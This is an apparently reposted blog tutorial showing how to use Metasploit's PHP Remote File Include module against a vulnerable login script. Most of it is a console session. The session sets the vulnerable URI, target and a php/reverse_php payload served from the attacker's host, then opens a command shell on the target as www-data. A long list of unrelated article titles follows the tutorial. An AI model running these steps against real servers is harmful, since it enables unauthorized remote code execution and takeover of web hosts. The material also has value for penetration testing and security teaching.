Using the Metasploit PHP Remote File Include Module
来源:互联网 发布:淘宝骗运费险 编辑:程序博客网 时间:2024/06/10 00:06
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.
Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXXlet's see it in action
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========
Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Space: 32768
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
dir
0.jpeg header.inc.php license.txt slog_users.txt version.txt
1.jpeg index.asp old slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php
id uid=33(www-data) gid=33(www-data) groups=33(www-data)
- Using the Metasploit PHP Remote File Include Module
- phpBB 2.0.13 Path Disclosure And Remote php File Include
- phpBB 2.0.13 Path Disclosure And Remote php File Include
- Using the Remote Debugger
- PHPmyGallery Local and Remote File Include Vulnerabilities
- C# Read file on the remote PC
- The Configuration File – “remote” Section
- magento “include(Mage/Customemail/Helper/Data.php) cant open the file”
- Remote Mount a VMDK File Using vmware-mount
- WMAP (Metasploit Module)
- use curl to upload file with remote php file
- the include of head file(1)
- the include of head file(2)
- Using Metasploit WMAP
- Overview Of The Drupal Module Info File
- Metasploit - Common Metasploit Module Coding Mistakes
- Cannot open include file: \'remote-ext.h\': No such file or directory
- Remote Debugging connecting to a Remote Stub using the Microsoft Debugging Tools for Windows
- 使用AJAX的方法将TextBox控件和Calendar控件结合使用,点击TextBox后弹出Calendar控件
- mysql删除第一条记录
- 国务院正式批准长三角规划:将建世界级城市群
- Watch Your WHOIS Entries
- LAMP 安装编译参数
- Using the Metasploit PHP Remote File Include Module
- 2010网页设计作品展
- union用法
- Metasploit jboss deployment file repository exploit
- 改变页面使用的CSS文件,使网页进行布局或色调等改变
- mplayer字幕乱码横线问题
- 面对错误和异常
- Layer Four Traceroute
- hta类型文件显示异常的解决办法